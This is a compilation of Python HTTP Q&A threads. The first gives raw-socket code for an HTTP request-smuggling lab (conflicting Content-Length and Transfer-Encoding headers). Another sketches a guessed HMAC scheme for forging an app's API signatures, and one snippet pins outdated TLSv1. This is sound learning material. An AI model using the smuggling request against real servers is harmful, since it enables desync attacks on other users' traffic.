Can I use the Python requests library to send inconsistent requests?

I am trying to write a Python script containing a somewhat unusual HTTP request as part of learning about web attacks and solving the lab at
https://portswigger.net/web-security/request-smuggling/lab-basic-cl-te.
There, I need to issue a request containing both a Content-Length and a Transfer-Encoding header that disagree with each other.
My basic, still-unmanipulated request looks like this and works as expected:
with requests.Session() as client:
    client.verify = False
    client.proxies = proxies
    [...]
    data = '0\r\n\r\nX'
    req = requests.Request('POST', host, data=data)
    prep = client.prepare_request(req)
    client.send(prep)
[...]
Content-Length: 6\r\n
\r\n
0\r\n
\r\n
X
However, as soon as I add the Transfer-Encoding header, the request itself gets modified.
data = '0\r\n\r\nX'
req = requests.Request('POST', host, data=data)
prep = client.prepare_request(req)
prep.headers['Transfer-Encoding'] = 'chunked'
client.send(prep)
The request that is actually sent down the wire is
[...]
Content-Length: 0\r\n
\r\n
whereas the expected request would be
[...]
Content-Length: 6\r\n
Transfer-Encoding: chunked\r\n
\r\n
0\r\n
\r\n
X
The same thing happens if I flip things around, prepare a chunked request and modify the Content-Length header afterwards:
def gen():
    yield b'0\r\n'
    yield b'\r\n'
    yield b'X'

req = requests.Request('POST', host, data=gen())
prep = client.prepare_request(req)
prep.headers['Content-Length'] = '6'
client.send(prep)
Basically, the Transfer-Encoding header gets removed completely, the data gets reinterpreted according to the chunking, and the Content-Length header gets recalculated to match.
I was under the impression that preparing a request and manipulating its content before sending would send the modified content, but either this assumption is wrong or I am doing something horribly wrong.
Is sending such a request possible this way, or do I have to drop to a lower level to put arbitrary data on the wire?

requests is a well-behaved HTTP client, and as such it will prevent you from generating malformed HTTP requests; in many cases a malformed request would simply earn you a 400 error.
To generate deliberate syntax errors in HTTP requests you need to avoid high-level HTTP clients (a browser, but also an HTTP library). Instead you need to go down to TCP/IP socket management (and maybe SSL as well) and write the full HTTP protocol with your own code, no library.
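Following that advice, here is a minimal Python 3 sketch of building the conflicting-header request by hand and pushing it through a raw socket. The host, path, and 4096-byte read are placeholders for illustration; only the two clashing headers come from the question:

```python
import socket


def build_smuggle_request(host, body):
    # Both headers are present and in deliberate disagreement:
    # Content-Length counts the whole body, while Transfer-Encoding
    # claims the body is chunked (and '0\r\n\r\n' ends the chunked part).
    return (
        'POST / HTTP/1.1\r\n'
        'Host: {}\r\n'
        'Content-Length: {}\r\n'
        'Transfer-Encoding: chunked\r\n'
        '\r\n'
        '{}'
    ).format(host, len(body), body)


def send_raw(host, port, raw):
    # The bytes go out exactly as written -- no library rewrites the headers.
    with socket.create_connection((host, port)) as sock:
        sock.sendall(raw.encode('ascii'))
        return sock.recv(4096)
```

For the lab, `send_raw` would additionally need to go through `ssl.SSLContext.wrap_socket`, since the target is HTTPS.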

Related

How is the signature in an https request encrypted?

I captured this https request from my Android phone.
GET https://picaapi.picacomic.com/init?platform=android HTTP/1.1
accept: application/vnd.picacomic.com.v1+json
time: 1579258278
nonce: b4cf4158c0da4a70b4b7e58a0b0b5a55
signature: 65448a52a6d19ceecf21d249ae25e564b61425b4d371f6a20fb4fcbbb9131d9d
app-version: 2.2.1.3.3.4
After replaying it in Fiddler several times, it became obvious that the site checks the two values 'nonce' and 'signature' before giving a response; otherwise the response only contains an error code. Since I want to use this API to request content from the site, I need to know how these two values are generated.
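No answer was posted here, but tokens of this shape (a 32-hex-character nonce plus a 64-hex-character signature, i.e. SHA-256 width) are commonly produced by an HMAC over request fields, with the key embedded in the app. The sketch below is purely speculative and is not the real scheme for this API; the secret, the field order, and the function name are all assumptions, and the actual algorithm would have to be recovered from the APK itself:

```python
import hashlib
import hmac
import time
import uuid

# Hypothetical reconstruction (NOT the verified picacomic scheme): many
# mobile APIs compute signature = HMAC(app_secret, path + time + nonce).
APP_SECRET = b'secret-embedded-in-the-app'  # placeholder


def sign(path, ts, nonce):
    message = '{}{}{}'.format(path, ts, nonce).encode('utf-8')
    return hmac.new(APP_SECRET, message, hashlib.sha256).hexdigest()


nonce = uuid.uuid4().hex           # 32 hex chars, like the captured value
ts = str(int(time.time()))
signature = sign('init?platform=android', ts, nonce)
```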

Can HTTP 200 response have incomplete data?

I am requesting PDF binary content from a Tomcat webservice from a Python web application server.
We have implemented a two-attempt retry in Python, shown below. Once in a while we get an HTTP 500 response. This issue is being investigated; it is very likely an environment issue related to insufficient resources (e.g. the maximum number of processes being reached). On the retry, more often than not, we get an HTTP 200 with partial blob content (judged by the EOF marker in the PDF). How is that possible?
Are there any flaws in this retry logic? How an HTTP 200 response can have incomplete data is beyond my understanding. Is the HTTP 200 sent first and then the real data (which would mean the server can die after it has sent the HTTP 200)? The only other explanation is that the server sends the entire content, but the program generating the data produces incomplete output due to some resource issue, which might also have caused the HTTP 500.
# There is a unique id as well to make it a new request. (retries is 2 by default)
while retries:
    try:
        req = urllib2.Request(url, data=input_html)
        req.add_header('Accept', 'application/pdf')
        req.add_header('Content-Type', 'text/html')
        handle = urllib2.urlopen(req)
        pdf_blob = handle.read()
    except:
        log(traceback)
        retries = retries - 1
        if not retries:
            raise
Architecture is as follows:
Web Application -> Calls Tomcat -> Gets PDF -> Stores To DB.
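Yes, a 200 can carry a truncated body: the status line and headers go out before the body, so a server (or the process feeding it) can die mid-stream after committing to 200. One practical guard is to validate the body before storing it instead of trusting the status code. A sketch, assuming a dict-like headers mapping; the %%EOF check relies on the marker that ends a well-formed PDF:

```python
def looks_complete(headers, body):
    """Reject a truncated 200 response before storing it."""
    expected = headers.get('Content-Length')
    if expected is not None and len(body) != int(expected):
        return False  # connection was cut mid-body
    if headers.get('Content-Type', '').startswith('application/pdf'):
        # a well-formed PDF ends with an %%EOF marker
        return body.rstrip().endswith(b'%%EOF')
    return True
```

In the retry loop above, treating `not looks_complete(...)` the same as an exception would make the retry cover partial bodies, not just outright failures.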

Office 365 REST API (Python) Mark Email as Read

I'm sure I'm doing something simple wrong, but I can't for the life of me figure out how to set the "IsRead" property to true. It's the last step of my process, which gets a filtered list of messages and stores and processes any attachments.
According to the docs "IsRead" is writable: http://msdn.microsoft.com/office%5Coffice365%5CAPi/complex-types-for-mail-contacts-calendar#ResourcesMessage
http://msdn.microsoft.com/office%5Coffice365%5CAPi/mail-rest-operations#MessageoperationsUpdatemessages
I'm using python 2.7 and the requests module:
# once file acquired mark the email as read
params = {'IsRead':'True'}
base_email_url = u'https://outlook.office365.com/api/v1.0/me/messages/{0}'.format( msgId )
response = requests.patch(base_email_url, params, auth=(email,pwd))
log.debug( response )
The response that comes back is this:
{"error":{"code":"ErrorInvalidRequest","message":"Cannot read the request body."}}
What's the problem with my request?
At first glance it looks OK. I wonder if the Content-Type header isn't being set to "application/json" or something along those lines. Try getting a network trace and verify that the request looks something like:
PATCH https://outlook.office365.com/api/v1.0/Me/Messages('msgid') HTTP/1.1
Accept: application/json;odata.metadata=full
Authorization: Bearer <token>
Content-Type: application/json;odata.metadata=full
Host: outlook.office365.com
Content-Length: 24
Expect: 100-continue
Connection: Keep-Alive
{
"IsRead": "true"
}
Well, I have an answer for myself, and it is indeed a simple matter.
My mistake was not fully reading how PATCH differs from GET or POST.
In short, it's important to make sure your headers are set to the right content type.
Here is the working code:
import json

# once file acquired mark the email as read
changes = {u'IsRead': u'True'}
headers = {'Content-Type': 'application/json'}
json_changes = json.dumps(changes)
base_email_url = u'https://outlook.office365.com/api/v1.0/me/messages/{0}'.format(msgId)
response = requests.patch(base_email_url, data=json_changes, auth=__AUTH, headers=headers)
log.debug(response)

How to extract JSON data from a response containing a header and body?

this is my first question posed to Stack Overflow, because typically I can find the solutions to my problem here, but for this particular situation, I cannot. I am writing a Python plugin for my compiler that outputs REST calls in various languages for interaction with an API. I am authenticating with the socket and ssl modules by sending a username and password in the request body in JSON form. Upon successful authentication, the API returns a response in the following format with important response data in the body:
HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Date: Tue, 05 Feb 2013 03:36:18 GMT
Vary: Accept-Charset, Accept-Encoding, Accept-Language, Accept
Accept-Ranges: bytes
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: POST,OPTIONS,GET
Access-Control-Allow-Headers: Content-Type
Server: Restlet-Framework/2.0m5
Content-Type: text/plain;charset=ISO-8859-1
Content-Length: 94
{"authentication-token":"<token>","authentication-secret":"<secret>"}
This is probably a very elementary question for Pythonistas, given Python's powerful tools for string manipulation. But alas, I am a new programmer who started with Java. I would like to know the best way to parse this entire response to obtain the "<token>" and "<secret>". Should I search for a "{" and dump the substring into a JSON object? My intuition tells me to try the re module, but I cannot figure out how it would apply here, since the pattern of the token and secret is obviously not predictable. Because I have opted to authenticate with a low-level module set, this response is one big string, obtained by constructing the header, appending JSON data to it in the body, then executing the request and reading the response with the following code:
#Socket configuration and connection execution
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
conn = ssl.wrap_socket(sock, ca_certs = pem_file)
conn.connect((host, port))
conn.send(req)
response = conn.recv()
print(response)
The print statement outputs the first code sample. Any help or insight would be greatly appreciated!
HTTP headers are split from the rest of the body by a \r\n\r\n sequence. Do something like:
import json
...
(headers, js) = response.split("\r\n\r\n", 1)  # maxsplit=1 guards against \r\n\r\n inside the body
data = json.loads(js)
token = data["authentication-token"]
secret = data["authentication-secret"]
You'll probably want to check the response, etc, and various libraries (e.g. requests) can do all of this a whole lot easier for you.
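If you do stay on raw sockets, a slightly more defensive parse looks like this. It assumes the whole response arrives in one recv() and is not chunked (both of which hold for the small response shown above, but not in general):

```python
import json


def parse_response(raw):
    # split the status line + headers from the body at the FIRST blank line only
    head, _, body = raw.partition('\r\n\r\n')
    status_line, *header_lines = head.split('\r\n')
    headers = dict(line.split(': ', 1) for line in header_lines)
    return status_line, headers, json.loads(body)
```

With the response from the question, `parse_response` yields the status line, a header dict, and the decoded credentials in one call.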

python: HTTP PUT with unencoded binary data

I cannot for the life of me figure out how to perform an HTTP PUT request with verbatim binary data in Python 2.7 with the standard Python libraries.
I thought I could do it with urllib2, but that fails because urllib2.Request expects its data in application/x-www-form-urlencoded format. I do not want to encode the binary data, I just want to transmit it verbatim, after the headers that include
Content-Type: application/octet-stream
Content-Length: (whatever my binary data length is)
This seems so simple, but I keep going round in circles and can't seem to figure out how.
How can I do this? (aside from open up a raw binary socket and write to it)
I found out my problem. It seems there is some obscure behavior in urllib2.Request / urllib2.urlopen() (at least in Python 2.7)
The urllib2.Request(url, data, headers) constructor seems to expect the same type of string in its url and data parameters.
I was giving the data parameter raw data from a file read() call (which in Python 2.7 returns it in the form of a 'plain' string), but my url was accidentally Unicode because I concatenated a portion of the URL from the result of another function which returned Unicode strings.
Rather than trying to "downcast" url from Unicode -> plain strings, it tried to "upcast" the data parameter to Unicode, and it gave me a codec error. (oddly enough, this happens on the urllib2.urlopen() function call, not the urllib2.Request constructor)
When I changed my function call to
# headers contains `{'Content-Type': 'application/octet-stream'}`
r = urllib2.Request(url.encode('utf-8'), data, headers)
it worked fine.
You're misreading the documentation: urllib2.Request expects the data already encoded, and for POST that usually means the application/x-www-form-urlencoded format. You are free to associate any other, binary data, like this:
import urllib2
data = b'binary-data'
r = urllib2.Request('http://example.net/put', data,
                    {'Content-Type': 'application/octet-stream'})
r.get_method = lambda: 'PUT'
urllib2.urlopen(r)
This will produce the request you want:
PUT /put HTTP/1.1
Accept-Encoding: identity
Content-Length: 11
Host: example.net
Content-Type: application/octet-stream
Connection: close
User-Agent: Python-urllib/2.7
binary-data
Have you considered/tried using httplib?
HTTPConnection.request(method, url[, body[, headers]])
This will send a request to the server using the HTTP request method
method and the selector url. If the body argument is present, it
should be a string of data to send after the headers are finished.
Alternatively, it may be an open file object, in which case the
contents of the file is sent; this file object should support fileno()
and read() methods. The header Content-Length is automatically set to
the correct value. The headers argument should be a mapping of extra
HTTP headers to send with the request.
This snippet worked for me to PUT an image on an HTTPS site. If you don't need HTTPS, use
httplib.HTTPConnection(URL) instead.
import httplib
import ssl
API_URL="api-mysight.com"
TOKEN="myDummyToken"
IMAGE_FILE="myimage.jpg"
imageID="myImageID"
URL_PATH_2_USE="/My/image/" + imageID +"?objectId=AAA"
headers = {"Content-Type":"application/octet-stream", "X-Access-Token": TOKEN}
imgData = open(IMAGE_FILE, "rb")
REQUEST="PUT"
conn = httplib.HTTPSConnection(API_URL, context=ssl.SSLContext(ssl.PROTOCOL_TLSv1))
conn.request(REQUEST, URL_PATH_2_USE, imgData, headers)
response = conn.getresponse()
result = response.read()
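On Python 3 the same PUT goes through http.client, httplib's successor. A self-contained sketch that exercises it against a throwaway local server instead of a real API (the handler, path, and payload are all made up for the demonstration):

```python
import http.client
import threading
from http.server import BaseHTTPRequestHandler, HTTPServer

received = {}


class PutHandler(BaseHTTPRequestHandler):
    def do_PUT(self):
        length = int(self.headers['Content-Length'])  # set by the client
        received['body'] = self.rfile.read(length)
        received['ctype'] = self.headers['Content-Type']
        self.send_response(200)
        self.end_headers()

    def log_message(self, *args):
        pass  # silence per-request logging


# serve exactly one request in the background
server = HTTPServer(('127.0.0.1', 0), PutHandler)
threading.Thread(target=server.handle_request, daemon=True).start()

payload = b'\x00\x01binary\xff'  # stand-in for real image bytes
conn = http.client.HTTPConnection('127.0.0.1', server.server_port)
# Content-Length is computed from the body automatically
conn.request('PUT', '/upload', body=payload,
             headers={'Content-Type': 'application/octet-stream'})
resp = conn.getresponse()
```

The body goes out verbatim, which is exactly the behavior the question was after.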
